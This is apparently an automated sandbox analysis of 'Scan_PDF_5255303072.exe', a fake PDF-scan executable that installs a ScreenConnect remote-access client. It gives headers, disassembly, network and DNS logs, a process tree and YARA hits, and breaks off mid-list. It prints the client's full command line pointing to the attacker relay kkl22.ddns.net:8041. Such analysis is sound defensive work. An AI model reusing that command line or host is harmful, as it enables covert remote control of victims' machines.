                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                      Signature Valid:true
                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                      Signature Validation Error:The operation completed successfully
                                                                      Error Number:0
                                                                      Not Before, Not After
                                                                      • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                      Subject Chain
                                                                      • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                      Version:3
                                                                      Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                      Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                      Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                      Serial:0B9360051BCCF66642998998D5BA97CE
                                                                      Instruction
                                                                      call 00007FD5A51CE94Ah
                                                                      jmp 00007FD5A51CE3FFh
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push 00000000h
                                                                      call dword ptr [0040D040h]
                                                                      push dword ptr [ebp+08h]
                                                                      call dword ptr [0040D03Ch]
                                                                      push C0000409h
                                                                      call dword ptr [0040D044h]
                                                                      push eax
                                                                      call dword ptr [0040D048h]
                                                                      pop ebp
                                                                      ret
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000324h
                                                                      push 00000017h
                                                                      call dword ptr [0040D04Ch]
                                                                      test eax, eax
                                                                      je 00007FD5A51CE587h
                                                                      push 00000002h
                                                                      pop ecx
                                                                      int 29h
                                                                      mov dword ptr [004148D8h], eax
                                                                      mov dword ptr [004148D4h], ecx
                                                                      mov dword ptr [004148D0h], edx
                                                                      mov dword ptr [004148CCh], ebx
                                                                      mov dword ptr [004148C8h], esi
                                                                      mov dword ptr [004148C4h], edi
                                                                      mov word ptr [004148F0h], ss
                                                                      mov word ptr [004148E4h], cs
                                                                      mov word ptr [004148C0h], ds
                                                                      mov word ptr [004148BCh], es
                                                                      mov word ptr [004148B8h], fs
                                                                      mov word ptr [004148B4h], gs
                                                                      pushfd
                                                                      pop dword ptr [004148E8h]
                                                                      mov eax, dword ptr [ebp+00h]
                                                                      mov dword ptr [004148DCh], eax
                                                                      mov eax, dword ptr [ebp+04h]
                                                                      mov dword ptr [004148E0h], eax
                                                                      lea eax, dword ptr [ebp+08h]
                                                                      mov dword ptr [004148ECh], eax
                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                      mov dword ptr [00414828h], 00010001h
                                                                      Programming Language:
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 build 21022
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x25d28
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                      FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                      FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                      FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                      FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                      RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                      DLLImport
                                                                      mscoree.dllCorBindToRuntimeEx
                                                                      KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                      OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 2, 2024 06:13:17.269304037 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:17.274142981 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:17.274251938 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:18.949912071 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:18.954814911 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:19.133212090 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:19.172548056 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:19.177522898 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:19.429375887 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:19.521698952 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:19.521754026 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:22.019284964 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:22.019285917 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:13:22.025993109 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:22.026005030 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:22.026015997 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:22.026026011 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:13:22.026070118 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:14:22.036602020 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:14:22.041623116 CEST804149710188.119.113.59192.168.2.3
                                                                      Oct 2, 2024 06:15:22.052257061 CEST497108041192.168.2.3188.119.113.59
                                                                      Oct 2, 2024 06:15:22.057209969 CEST804149710188.119.113.59192.168.2.3
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 2, 2024 06:13:17.205336094 CEST5053153192.168.2.31.1.1.1
                                                                      Oct 2, 2024 06:13:17.214538097 CEST53505311.1.1.1192.168.2.3
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 2, 2024 06:13:17.205336094 CEST192.168.2.31.1.1.10x1bb0Standard query (0)kkl22.ddns.netA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 2, 2024 06:13:17.214538097 CEST1.1.1.1192.168.2.30x1bb0No error (0)kkl22.ddns.net188.119.113.59A (IP address)IN (0x0001)false

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:00:13:09
                                                                      Start date:02/10/2024
                                                                      Path:C:\Users\user\Desktop\Scan_PDF_5255303072.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Scan_PDF_5255303072.exe"
                                                                      Imagebase:0x370000
                                                                      File size:5'685'032 bytes
                                                                      MD5 hash:59A8C372735DAFB6E20AD3CF30770D8E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1398979904.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1385033934.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:00:13:10
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                                                                      Imagebase:0x8e0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:0C4BF481F0BE4F7435AD7926338AAA36
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:00:13:11
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                      Imagebase:0x7ff726660000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:792F0E17B34DE5D3E63064D1EB6FADE1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:00:13:11
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E C
                                                                      Imagebase:0x8e0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:0C4BF481F0BE4F7435AD7926338AAA36
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:00:13:11
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                      Imagebase:0x5b0000
                                                                      File size:61'440 bytes
                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:00:13:13
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3A
                                                                      Imagebase:0x8e0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:0C4BF481F0BE4F7435AD7926338AAA36
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:00:13:14
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000
                                                                      Imagebase:0x8e0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:0C4BF481F0BE4F7435AD7926338AAA36
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:00:13:14
                                                                      Start date:02/10/2024
                                                                      Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
                                                                      Imagebase:0xf30000
                                                                      File size:95'520 bytes
                                                                      MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 3%, Virustotal, Browse
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:00:13:16
                                                                      Start date:02/10/2024
                                                                      Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9" "User"
                                                                      Imagebase:0x3b0000
                                                                      File size:601'376 bytes
                                                                      MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:00:13:19
                                                                      Start date:02/10/2024
                                                                      Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c" "System"
                                                                      Imagebase:0x210000
                                                                      File size:601'376 bytes
                                                                      MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:00:13:52
                                                                      Start date:02/10/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                      Imagebase:0x7ff743e40000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Reset < >
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LKq$LKq$LKq
                                                                        • API String ID: 0-354187741
                                                                        • Opcode ID: 0f57e6e61a257bda7e26d48765de4b15f067da23390239ad2de1f22c367f6737
                                                                        • Instruction ID: a37d1323b262b0c92ed0ee2e5c72830dc38ebf093432590a933a798fb6be8d60
                                                                        • Opcode Fuzzy Hash: 0f57e6e61a257bda7e26d48765de4b15f067da23390239ad2de1f22c367f6737
                                                                        • Instruction Fuzzy Hash: 34429171A006158FDB14DF69C884AAEBBF2FF88310B54862DE516EB791DB34EC41CB94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 110d99201f4aafa9b154bc325d15bf9391239976e9ac1e999873ac20428b1984
                                                                        • Instruction ID: 3c449416b67df7a4a849e6f74ec52be0caef845ae4d20bb819085eb7d21128d3
                                                                        • Opcode Fuzzy Hash: 110d99201f4aafa9b154bc325d15bf9391239976e9ac1e999873ac20428b1984
                                                                        • Instruction Fuzzy Hash: B1620A34A00319CFDB15DF64D858B9DBBB2FB89310F1085A9E90AA7351DB75AD82CF90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: cc1e3d3a4b677d00d809264ad6debe5137fe4cdc29c45c6f66b53976b936700b
                                                                        • Instruction ID: 3e7c0a604e54505f88892ec18904a970d04d904873bcdda4528df6f54880fd80
                                                                        • Opcode Fuzzy Hash: cc1e3d3a4b677d00d809264ad6debe5137fe4cdc29c45c6f66b53976b936700b
                                                                        • Instruction Fuzzy Hash: 6A421B34A00318CFDB15DF64D858B9DB7B2FB89310F1085A9E90AAB351DB75AD82CF90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cefe8c35d6be2f2d8b7c9be170d96160328e86119a90a9c55a50448c3156e16
                                                                        • Instruction ID: cd113d89962a7964e08c4c18eac5b7db1fe608cdc69792e454a1d50a167e33b0
                                                                        • Opcode Fuzzy Hash: 5cefe8c35d6be2f2d8b7c9be170d96160328e86119a90a9c55a50448c3156e16
                                                                        • Instruction Fuzzy Hash: 75B20579A002089FDB14DFA8C994EADBBB2FF88310F158559E959AB365DB30EC41CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C8${/
                                                                        • API String ID: 0-4231431693
                                                                        • Opcode ID: 15f91eaa6ce37cbbe52094b683f5630fafb9fbdbcd5ee6af53c348fb9540f24d
                                                                        • Instruction ID: 37979bbe1d79876af11bba78355f1a28e2d862aa782b089f529a15f481dd33e1
                                                                        • Opcode Fuzzy Hash: 15f91eaa6ce37cbbe52094b683f5630fafb9fbdbcd5ee6af53c348fb9540f24d
                                                                        • Instruction Fuzzy Hash: 5061B3303003924FEB05ABBDE895A6E77EBEBC56103048629D119CB356EF74EC418BD5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: kjm^
                                                                        • API String ID: 0-4120997269
                                                                        • Opcode ID: beff9e9c08d57d4fd3e0dc63f4c2bd46fb895eb1a98dc86ea1826e4e30a33c41
                                                                        • Instruction ID: 23d105edbd629ef03d9e9041b4deef7819282234aa585ebaf68d407adbce17eb
                                                                        • Opcode Fuzzy Hash: beff9e9c08d57d4fd3e0dc63f4c2bd46fb895eb1a98dc86ea1826e4e30a33c41
                                                                        • Instruction Fuzzy Hash: C5513C38B002058FDB10DF69C884EAAB7F6BF9C310B158569E516DB365EB70EC01CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: kjm^
                                                                        • API String ID: 0-4120997269
                                                                        • Opcode ID: 3331583e228fdef576f099472884a2b6d8e41cfd5157898eb891f6123257d553
                                                                        • Instruction ID: bbe77916e5fd836afdf7256c71bb491e2148579ea1d1530368c1528f906ac6c8
                                                                        • Opcode Fuzzy Hash: 3331583e228fdef576f099472884a2b6d8e41cfd5157898eb891f6123257d553
                                                                        • Instruction Fuzzy Hash: 5F511B38B002098FDB10DF69C884EAAB7F6BF9C3107158569E516DB365EB71EC01CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398499046.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ae0000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: s+
                                                                        • API String ID: 0-1285507049
                                                                        • Opcode ID: 0da6d4c20c13d8472a9d7ced25ebe6a26b5fb03b25865dbde2cda4aaba4c34a4
                                                                        • Instruction ID: 924427776a7cbd0a8a6f65b8971c0519c3aae8c7abea3bf2423e0a2a0a32a71c
                                                                        • Opcode Fuzzy Hash: 0da6d4c20c13d8472a9d7ced25ebe6a26b5fb03b25865dbde2cda4aaba4c34a4
                                                                        • Instruction Fuzzy Hash: 6941D432A00219DFDF55DFA5C894A9EBBB2FF85300F548569E805AB344DB30AD05CBE8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: K]
                                                                        • API String ID: 0-3798347547
                                                                        • Opcode ID: 96e4a744053143c0377da750c4b8a4ef610de6f63830a9d2351de40eadc0701f
                                                                        • Instruction ID: 4c4c2a66e891568107f0de2e092bec8c452bf41996aa0ed33413cbd9561045d1
                                                                        • Opcode Fuzzy Hash: 96e4a744053143c0377da750c4b8a4ef610de6f63830a9d2351de40eadc0701f
                                                                        • Instruction Fuzzy Hash: C931D2366083509FEB02DB38D89178EFBF5EF85210B0484AAD849CF356EB30DC0587A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1383807539.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1920000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: K]
                                                                        • API String ID: 0-3798347547
                                                                        • Opcode ID: c56c838a9b5c901d74911940c76713c8076e2704e4aff528739589fe6af1b423
                                                                        • Instruction ID: 54b2ba1d7cdcfecebd8b57e4123d0fa9e58ab6cee30da07e6f75cebb9c0083a0
                                                                        • Opcode Fuzzy Hash: c56c838a9b5c901d74911940c76713c8076e2704e4aff528739589fe6af1b423
                                                                        • Instruction Fuzzy Hash: 8731CF326043509FEB01DF79D89178EBBE5EF85210B04846AE849CF356EB30DC0587A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1398699650.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b00000_Scan_PDF_5255303072.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: S/jm^
                                                                        • API String ID: 0-3516529370
